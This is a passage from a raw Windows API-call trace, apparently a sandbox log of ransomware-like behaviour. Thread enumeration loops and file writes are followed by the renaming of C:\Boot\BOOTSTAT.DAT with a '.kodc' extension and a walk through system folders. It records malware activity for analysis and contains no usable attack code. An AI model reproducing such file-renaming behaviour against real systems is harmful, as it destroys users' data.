(hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.831] GetTickCount () returned 0x11f072f [0096.831] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.832] GetTickCount () returned 0x11f072f [0096.832] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.832] GetTickCount () returned 0x11f072f [0096.832] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.833] GetTickCount () returned 0x11f072f [0096.833] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.834] GetTickCount () returned 0x11f072f [0096.834] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.835] GetTickCount () returned 0x11f072f [0096.835] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.836] GetTickCount () returned 0x11f072f [0096.836] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.837] GetTickCount () returned 0x11f073f [0096.837] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.838] GetTickCount () returned 0x11f073f [0096.838] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.839] GetTickCount () returned 0x11f073f [0096.839] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.840] GetTickCount () returned 0x11f073f [0096.840] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.840] GetTickCount () returned 0x11f073f [0096.841] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.841] GetTickCount () returned 0x11f073f [0096.841] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.842] GetTickCount () returned 0x11f073f [0096.842] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.843] GetTickCount () returned 0x11f073f [0096.843] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.844] GetTickCount () returned 0x11f073f [0096.844] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.845] GetTickCount () returned 0x11f073f [0096.845] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.846] GetTickCount () returned 0x11f073f [0096.846] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.847] GetTickCount () returned 0x11f073f [0096.847] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.848] GetTickCount () returned 0x11f073f [0096.848] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.848] GetTickCount () returned 0x11f073f [0096.848] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.849] GetTickCount () returned 0x11f073f [0096.849] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.850] GetTickCount () returned 0x11f073f [0096.850] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.851] GetTickCount () returned 0x11f073f [0096.851] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.852] GetTickCount () returned 0x11f073f [0096.852] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.853] GetTickCount () returned 0x11f074e [0096.854] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.855] GetTickCount () returned 0x11f074e [0096.855] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.856] GetTickCount () returned 0x11f074e [0096.856] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.857] GetTickCount () returned 0x11f074e [0096.857] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.857] GetTickCount () returned 0x11f074e [0096.857] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.858] GetTickCount () returned 0x11f074e [0096.858] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.859] GetTickCount () returned 0x11f074e [0096.859] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.860] GetTickCount () returned 0x11f074e [0096.860] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.861] GetTickCount () returned 0x11f074e [0096.861] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.862] GetTickCount () returned 0x11f074e [0096.862] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.863] GetTickCount () returned 0x11f074e [0096.863] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.864] GetTickCount () returned 0x11f074e [0096.864] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.865] GetTickCount () returned 0x11f074e [0096.865] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.866] GetTickCount () returned 0x11f074e [0096.866] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.867] GetTickCount () returned 0x11f074e [0096.867] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.868] GetTickCount () returned 0x11f074e [0096.868] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.869] GetTickCount () returned 0x11f075e [0096.869] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.870] GetTickCount () returned 0x11f075e [0096.870] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.871] GetTickCount () returned 0x11f075e [0096.871] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.872] GetTickCount () returned 0x11f075e [0096.872] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.873] GetTickCount () returned 0x11f075e [0096.874] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.875] GetTickCount () returned 0x11f075e [0096.875] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.876] GetTickCount () returned 0x11f075e [0096.876] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.877] GetTickCount () returned 0x11f075e [0096.877] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.878] GetTickCount () returned 0x11f075e [0096.962] FreeLibrary (hLibModule=0x76e10000) returned 1 [0096.962] QueryPerformanceCounter (in: lpPerformanceCount=0x9e2efa4 | out: lpPerformanceCount=0x9e2efa4*=84239577960) returned 1 [0096.962] GlobalMemoryStatus (in: lpBuffer=0x9e2f414 | out: lpBuffer=0x9e2f414) [0096.965] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.965] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0096.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0096.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x694598 [0096.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x694598, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0096.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0096.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0096.966] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0096.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0096.966] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.966] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0096.966] CloseHandle (hObject=0x5cc) returned 1 [0096.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0096.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0096.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0096.968] MoveFileW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.kodc" (normalized: "c:\\boot\\bootstat.dat.kodc")) returned 1 [0096.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0096.969] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0096.971] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x3330338 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.971] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.971] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0096.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338fa8 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3331b88 | out: hHeap=0x630000) returned 1 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.972] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330478 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe60 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0096.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.972] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330478 | out: hHeap=0x630000) returned 1 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.973] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.973] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x69b948 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330478 [0096.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe60 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.974] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa187f1a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.974] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.975] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330748 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330888 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301f8 [0096.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330478 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0096.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.976] 